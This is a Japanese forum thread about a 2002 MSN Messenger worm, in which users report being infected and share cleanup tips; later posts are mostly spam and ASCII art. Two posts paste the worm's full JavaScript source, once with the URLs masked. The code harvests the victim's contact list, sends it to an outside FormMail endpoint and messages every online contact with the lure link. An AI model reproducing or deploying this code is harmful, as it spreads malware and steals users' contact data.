1 :
名無しさん@お腹いっぱい。 :
02/02/14 13:29
2 :
名無しさん@お腹いっぱい。 :02/02/14 13:30
そのアドレスクリックしたら、リストにあるメンバーに同じ物を 送ってしまう模様
3 :
名無しさん@お腹いっぱい。 :02/02/14 13:34
>>2 ああ、そうなんだ。要はクリックしなきゃいいんだね?
怖いのでさげ…
5 :
名無しさん@お腹いっぱい。 :02/02/14 13:37
クリックしちまった・・・
とりあえずクリックは禁止です。 中身見てみたんだけどIPは抜かれてるみたい。 固定IPじゃないなら繋ぎ直してIP変更しておくほうがいいです。 識者の方いたら解析きぼんぬ。
7 :
名無しさん@お腹いっぱい。 :02/02/14 13:43
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "URGENT - Go to
http://users.skynet.be/dark.angel/cool.htm ";
//var msgStr = "URGENT - Go to <a href="
http://users.skynet.be/dark.angel/cool.htm ">www.ratec.ar.cx</a> NOW";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
8 :
名無しさん@お腹いっぱい。 :02/02/14 13:44
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="
http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl " NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="
http://www.ratec.ar.cx " ID="Hidden1">
<input type="hidden" name="recipient" value="unmeteredinternet@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>
9 :
名無しさん@お腹いっぱい。 :02/02/14 13:44
ソースね これは悪質だ
10 :
名無しさん@お腹いっぱい。 :02/02/14 13:59
afe
11 :
名無しさん@お腹いっぱい。 :02/02/14 14:29
これ、結局なんなの?
12 :
名無しさん@お腹いっぱい。 :02/02/14 14:53
13 :
名無しさん@お腹いっぱい。 :02/02/14 15:00
unmeteredinternet@hotmail.com 送ってる? unmetered(計測、測定されていない)はダミーか・・・
14 :
名無しさん@お腹いっぱい。 :02/02/14 15:16
10人位から一気に来て、30人位に送っちまったよ(死
15 :
押しちゃった、、、、 :02/02/14 15:23
どうしよ? 1、破壊活動はありますか? 2、ワクチン等はどこで? 博識のかた、よろしくお願いします。、、、、、チンパイ(´Д`;)ヾ
>15 気にするな,タダの祭りだよ!
17 :
名無しさん@お腹いっぱい。 :02/02/14 15:40
てきとーなメール送ろうとしたら エラー : アドレス 'unmeteredinternet@hotmail.com" が存在しません。このメッセージは送信されませんでした。 ってなって送れなかった。
>>15 >>12 の推測が当たっているなら
1. 特に見あたりません
2. 特に必要ありません
>>16 ETC の forum は祭り状態になってますね
つまりココを書換えて(以下略
21 :
名無しさん@お腹いっぱい。 :02/02/14 16:05
パッチ入れてて踏んじゃったんだよなぁ(´ー`) 今のところ何も言われてないから被害はなしかな?
22 :
名無しさん@お腹いっぱい。 :02/02/14 16:20
もう友達から送られちゃったし、クリックしちゃったし 、自分も送ったらしいからやヴぁい( ゜Д゜)ゴルァ!
ウィルス直リンしてあほか…。
((((((。 ゚Д゚)ノ ヌオォォォ!!怒るでしかし!!
25 :
名無しさん@お腹いっぱい。 :02/02/14 17:06
ふんじゃったよー でも、URL存在しないと出たよ、IE6だから?
漏れURLクリックしたんだけど、 URLクリックした人、大丈夫かYO!! ガクガクブルブル((((((。;゚Д゚)何かなってたらどうしよう・・。
28 :
名無しさん@お腹いっぱい。 :02/02/14 18:46
踏んじゃったけど、発信してないみたいだなぁ ノートンPFWとルーターの所為かな?
31 :
名無しさん@お腹いっぱい。 :02/02/14 22:23
ここ見るとオイラのノートンが 反応するのですが? 気のせい?
32 :
名無しさん@お腹いっぱい。 :02/02/14 23:01
33 :
名無しさん@お腹いっぱい。 :02/02/14 23:04
オンラインのひと全部の窓が開いたぞ
34 :
名無しさん@お腹いっぱい。 :02/02/14 23:06
同じ仕組みのやつなのかな。
35 :
名無しさん@お腹いっぱい。 :02/02/14 23:08
>>34 iriaで落としたけど大体同じだったよ。
ところでブラウザからソース見る時ってどうやるんだっけ?
~~~view:
http://www. ~~~~って感じのやつ。
36 :
エジプシャン :02/02/14 23:12
>>35 みたいURLのhttpの前に[view-source:]の[]内を入れればOK。
>>36 >>37 ああ、~view:じゃなくて
view-source:だったか~。アリガトォ!!
39 :
名無しさん@お腹いっぱい。 :02/02/14 23:22
糞!踏んだー
40 :
名無しさん@お腹いっぱい。 :02/02/14 23:26
さっきノートン先生の定義ファイルを更新したとこだったよ。 あぶねー。
41 :
名無しさん@お腹いっぱい。 :02/02/14 23:31
>>32 今、それきたよ~。
>>36-37 でソースみたら、ノートン先生が反応したよ。
さっきウィルス定義自動更新されたのはこのせいだったのか。。。
42 :
名無しさん@お腹イパーイ :02/02/14 23:31
くそ流行だしてるYO
43 :
名無しさん@お腹いっぱい。 :02/02/14 23:33
漏れも踏んだけど、VB2002が反応した
そもそも、MSNメッセンジャ削除したらいいんでないの?
45 :
名無しさん@お腹いっぱい。 :02/02/15 00:06
>>44 それは強引だろ。
漏れもノートンアプデトしてたから無事だが、これはトロイ?
46 :
名無しさん@お腹いっぱい。 :02/02/15 00:06
ばすきゃんハンノウシネ~ヽ(`Д´)ノ
47 :
名無しさん@お腹いっぱい。 :02/02/15 00:12
48 :
名無しさん@お腹いっぱい。 :02/02/15 00:24
49 :
名無しさん@お腹いっぱい。 :02/02/15 00:26
C:\WINDOWS\Temporary Internet Filesからも感染するから、削除しなはれ。
51 :
名無しさん@お腹いっぱい。 :02/02/15 00:31
C:\Documents and Settings\●\Local Settings\Temporary Internet Files\Content.IE5\WX0HIJ01\l50[3] は JS.Menger.Worm ウィルスに感染しています。 このファイルを修復できません。 ファイルが見あたらないんだが。 Content.IE5フォルダのフォルダ全部削除してやりました。
52 :
名無しさん@お腹いっぱい。 :02/02/15 00:42
ieのプロバティから、全般のタブその中からファイルの削除でできなかった?>51
53 :
名無しさん@お腹いっぱい。 :02/02/15 00:49
>>52 わからん。出来るとは思うけど。
Content.IE5はアクセス拒否とか出てスキャンしてくれないし
54 :
名無しさん@お腹いっぱい。 :02/02/15 00:53
55 :
名無しさん@お腹いっぱい。 :02/02/15 00:54
>>53 う~ん。。HTMLファィルだよね?
アクセス拒否くらうもんなのかなぁ。
56 :
名無しさん@お腹いっぱい。 :02/02/15 00:56
>>55 HTMLなのかすら不明。
WX0HIJ01フォルダには何一つファイルは入ってなかったし。
57 :
名無しさん@お腹いっぱい。 :02/02/15 00:58
JS.Exception.Exploitもウィルス検索では引っかからなかったし。 イベントビューア見て初めて発見したよ。 今回も同じで検索では引っかからずイベントビューアで発見。
58 :
名無しさん@お腹いっぱい。 :02/02/15 01:00
>>56 んとね、俺が感染した奴はhtmlファイルからだったの。
だから感染元はHTMLファイルで間違いないと思うのね。
で、隠しファイルを表示するとかにして確かめてみた?
それで見えないとなるとちとやっかいだね。。
59 :
名無しさん@お腹いっぱい。 :02/02/15 01:02
>>58 もちろん。
隠しファイルも表示してセーフモードで調べたもん。
60 :
名無しさん@お腹いっぱい。 :02/02/15 01:30
>>1 セーフモード起動で、
C:\Windows\Sysem\mshtml.dll を
mshtml.vir にして、Win 再起動したらドーヨ?
61 :
名無しさん@お腹いっぱい。 :02/02/15 01:38
IEのパッチとメッセンジャーバージョンアップしないと駄目だな
javascriptきれよ
>>31 このスレッドの上の方でウイルスのソースが貼ってあるせいだろ。
64 :
名無しさん@お腹いっぱい。 :02/02/15 06:13
「JS.Menqer.Worm」が検出された藁
65 :
名無しさん@お腹いっぱい。 :02/02/15 11:04
IEパッチとメッセンジャー最新版でも防げない(藁 人柱になってやった俺に感謝せよ
<head> <title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "URGENT - Go to
http://####1 ";
//var msgStr = "URGENT - Go to <a href="
http://####1 ">www.ratec.ar.cx</a> NOW";
function Go(){
msnWin = document.open("res://####2", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1">
</object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();
if (msnWin.msnObj1.localState == 1){ msnWin.msnObj2.autoLogon(); } Contacts(); Send(); msnWin.close(); document.contents.submit(); } function Contacts(){ msnList = msnWin.msnObj1.list(0); document.contents.email.value = msnWin.msnObj1.localLogonName; document.contents.subject.value = Date(); var msnStr = "<br>"; for (i=0;i<msnList.count;i++){ if (msnList(i).state >1){ msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>"; } else{ msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>"; } } document.contents.contentBox.value = msnStr; } function Send(){ for (i=0;i<msnList.count; i++){ if (msnList(i).state >1){ msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0); } } }
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="
http://####3 "; NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="
http://####4 "; ID="Hidden1">
<input type="hidden" name="recipient" value="unmeteredinternet@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
http//users.skynet.be/dark.angel/cool.htm
これをクリックしてジャンプすると、自分の登録しているユーザに同様の
メッセージが送られ、蔓延します。
但し周りの状況から推察するに、これが起きるのはどうも Windows の
デフォルトブラウザが IE の場合のようです。当方 Opera6 をデフォルト
ブラウザにしているのですが、これは起きませんでした。
これについての情報を少し漁ってみたのですが、WWW 上では見当たりません
でした。それでこのソースを取得してみました。見たところクライアント
サイド実行型のスクリプトのようですが、当方ではちょっと分からないので
よろしければご教授頂けると幸いです。
本来ならば先頭と最後に <html></html>タグが入りますがここでは念のため
割愛しておきます。
また、URL が直接的にあらわれる部分は以下のように変更しています。
####1 = 'users.skynet.be/dark.angel/cool.htm'
####2 = 'mshtml.dll/blank.htm'
####3 = 'www.rjdesigns.co.uk/cgi-bin/FormMail.pl'
####4 = 'www.ratec.ar.cx'
http://memo.st.ryukoku.ac.jp/archive/200202.month/2955.html にある。
70 :
名無しさん@お腹いっぱい。 :02/02/17 17:01
上のリンク踏んだら、 「Js.Menger.Worm が検出されました」ってノートン先生がおっしゃったよー! とりあえずハケーンされたファイルは削除したけど…。何で開いていきなり感染?? あと、他の板でも見かけたけど、 MSNメッセンジャーの新しいバージョンが出た(Messenger v4.6)っていうからインストールしようとしたら、 「内容と署名が一致しません」…これって普通だったっけ??
71 :
名無しさん@お腹いっぱい。 :02/08/27 21:14
XP標準のMSNはいいよ。広告がなくってさ。
MSNのプロフィールの更新日って内容がどこも変ってないのに 更新日付だけが更新されているんですけど なぜ??
(^^)
(^^)
踏んじゃったyo(´Д`;)レス確認しようよ私。 チンパイで再セットアップしますた。←やり過ぎ 結局IPはぬかれてるの?ルーターで固定IPだったら心配ないのかな?
(^^)
∧_∧ ( ^^ )< ぬるぽ(^^)
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
/∵ ▼ \
/∴ ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
, |∴ / \ |、 /
|`──-( / )-( \)l | < ちゃんと見てくれたか?
| [ , っ l | \
`-, 'ヽ、_ソ }' \____________
ノ ヽ、 `' ノ、
/ ゝ ── ' ヽ
/ ,ィ -っ、 ヽ
| / 、__ う 人 ・ ,.y i
| /  ̄ | |
ヽ、__ノ ノ ノ
| x 9 /
| ヽ、_ _,ノ 彡イ
| (U) |
http://cgi.2chan.net/n/src/1056821090165.jpg
, -;;'".:.:.:.:./`=-;,_ / _=' _ , '";;;;;.:.:.:.:.:.:.r'/;/;彡;Xik''"ミ`ミ;、 ,':..:.:.''''':.:.:.:.:.:.:.!;;;:::::_//lj_,.>ミミミヾ,' ロマンティックageるよ ;;.:.:.:.:.:.:.:.:.:.:.:.:.:.! `;:/,_l l!lll;:`; !l!ill!!l.;.;!;!;!!l.:l:l:.l , - 、 :/:l j!ll l l;!!;l;l;i"l`メl.!;;l;l;:i _, l,、;! j! ロマンティックageるよ .!l!ll!l !,!l=、!i !.! l!'i,:`i ,.lkj l(yk. ミ(iヘ!、 !j !l'..レ'l l!ヽヘ ,.`-'` ,j .,!l;l ホントの勇気 見せてくれたら /!l.!;`'ヘ/`> -、_;:z' ノ;!;!'! _.ノ l!l!;l;!;l;i:ゝ=...,,___../;i;l;!!j !l;l;! !l;l;i:l: l l;|l;l;!;!;!' ロマンティックageるよ ,.._ヽl;l;l;l;l;.メ jl二`il~`ヽ. _,.-''`y,// /L,.___v ___!l |!l l_,,./ヽ ,-'" l!l l!`-リi,-=''+;:i',! .|!!. ヾ.._/ ロマンティックageるよ ,.ゝ=;" _,,. l ゙`=''`!__,,,.jl" 》 l ./ ヽ`y,,.. -'" `/ .l!'l! !
`, `、`、 i 丿/ (二! トキメク胸に キラキラ光った `メ, > `--= =-‐,' `==== ゝ `k,/'" `、 | / ,.',.'/ ,/ ! r `.、;/ゝ、 i~~~コ~!ト二l!コ!}'i k l 夢をageるよ ゝ'" `;'" -|! ヽヾ《 l ,,:j k_,_,i='" ‐-=|! ヽヾ、_ レ'" ! __ ,;。 / / |! ` y `i`l_,. "l iniy'='y'' ,/_/,,,.....,,,,,_ミ .j!=''" /j ..l l='"~`i _=' ...:::::lr r~ `;ミ__,,. /" .l_j k_,,='j'='"ニ::::::::::j ! || l {,-,v'"!L{,:::;;:::.-'" ! !'|i\ ,-'l-'/./_,=i"! `-'" l ! '|| \ ,-'" ,,l y_/ l!l' l ! |.!_,,-'" ,-'".l l .l`='"
85 :
名無しさん@お腹いっぱい。 :03/07/15 01:13
MSNでしらないところから広告?見たいなメッセくるのはなんですか?
あげ荒らし帰れよ
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
(??Д??)?????? ?????(??Д??)??????
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
92 :
名無しさん@お腹いっぱい。 :03/10/15 02:46
質問ですが 以下のサインイン名に対して、正しくないパスワードを入力した回数が多すぎます : とでてきたのですが不正アクセスでも食らったのでしょうか・・・ 時間たってもなおらないのですが・・・
このすれ、ずっとレス付いてないのに、のこってるよ・・・
94 :
名無しさん@お腹いっぱい。 :04/10/27 11:49:09
MSNメッセで、デジカメ画像のファイル送信をしたところ、相手側のPCの調子がおかしくなりました。 ネットに接続できないとか。 もちろん画像にウィルスが付いているはずもなく(チェック済み)。 何が原因でしょう?こんなことってあるんですか??
英語のスパムメールをブロックするソフトや方法なないのかね。spy-botやad-aware 以外に。
msn messengerのビデオチャット録画する方法おしえてください。 変死ん 激しく希望
99 :
名無しさん@お腹いっぱい。 :2006/06/03(土) 00:15:34
おめこ 意味もなく
t
11 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/06/24(日) 04:02:46 WORM STRATION.KUってのがメッセから感染して 隔離できない 手動でも削除できないUZEEe 内容はメッセをかいして登録してあるフレンドにメアドとかを送るものっぽい・・ ↑俺もこれきたわ・・・
test
(^o^)ノ<最下層だぞくずどもー
_ ∩ ( ゚∀゚)彡 八尾あげ!八尾あげ! ⊂彡
_ ∩ ( ゚∀゚)彡 八尾あげ!八尾あげ! 八尾あげ!八尾あげ! ⊂彡
_ ∩ ( ゚∀゚)彡 持ち越せ!持ち越せ! ⊂彡
tesuto
///// ( ・ω・) 監視中 ,ノ゙゙゙゙゙ハヽ、 `~ェ-ェー'
///// ( ・ω・) 監視中 ,ノ゙゙゙゙゙ハヽ、 `~ェ-ェー'
///// ( ・ω・) 監視中 ,ノ゙゙゙゙゙ハヽ、 `~ェ-ェー'
///// ( ・ω・) 監視中 ,ノ゙゙゙゙゙ハヽ、 `~ェ-ェー'
てs
..
下げえええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええ
00
てst
test
テス
test
122 :
名無しさん@お腹いっぱい。 :2008/07/04(金) 07:17:32
123 :
名無しさん@お腹いっぱい。 :2010/08/25(水) 23:57:05
age
document.write("<body onload=window();>")
∧_∧ ⊂( ・ω・) そもそもリモコンなどない! / ノ∪ し―-J |l| | 人ペシッ!! __ l__l
126 :
名無しさん@お腹いっぱい。 :2013/02/14(木) 21:08:21.94
_ |O\ | \ キリキリ ∧|∧ \ キリキリ ググゥ>(;⌒ヽ \ ∪ | (~) ∪∪ γ´⌒`ヽ ) ) {i:i:i:i:i:i:i:i:} ( ( ( ´・ω・)、 (O ⌒ )O ⊂_)∪
127 :
名無しさん@お腹いっぱい。 :
2014/09/23(火) 15:51:30.56 ふう